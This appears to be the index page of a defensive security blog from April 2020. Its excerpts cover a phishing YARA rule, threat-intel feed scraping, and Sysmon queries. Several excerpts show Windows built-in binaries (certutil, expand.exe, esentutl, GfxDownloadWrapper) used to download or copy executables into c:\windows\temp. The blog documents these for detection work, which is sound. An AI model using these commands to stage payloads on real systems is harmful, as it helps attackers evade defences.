neonprimetime security, just trying to help

Monday, April 27, 2020

phishingkit email phishing yara rule

/*     Phishing Kit Emails */ rule PhishingKitEmail {     strings:         $domain1 = "@gmail.com"         $domain2 = ...
1 comment:
Thursday, April 23, 2020

Script Query UrlHaus, OpenPhish, PhishTank and Extract Dns, IPs for Threat Intel Feed

code to pull dns & ips from urlhaus, openphish, phishtank, etc. #usage: iex (get-content .\GetData.ps1 | out-string) > output.txt ...
1 comment:
Wednesday, April 22, 2020

Query Sysmon Logs using Powershell Get-WinEvent

get-winevent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=1} | select Message |foreach-object {$a = $_.Mes...
1 comment:
Monday, April 20, 2020

GfxDownloadWrapper.exe downloader

cd c:\windows\system32\DriverStore\FileRepository\ki132337.inf_amd64_223d6831ffa64ab1 (sub folder may vary) GfxDownloadWrapper.exe https...
1 comment:

expand.exe files copied

To copy from a file share:
expand.exe \\share\test.txt c:\windows\temp\test.exe
2 comments:

esentutl file copies

Get from a file share:
esentutl.exe /y \\share\test.exe /d c:\windows\temp\test.exe
1 comment:

certutil downloader

certutil.exe -urlcache -split -f https://somewhere/test.exe c:\windows\temp\test.exe
dir c:\windows\temp\test.exe
1 comment: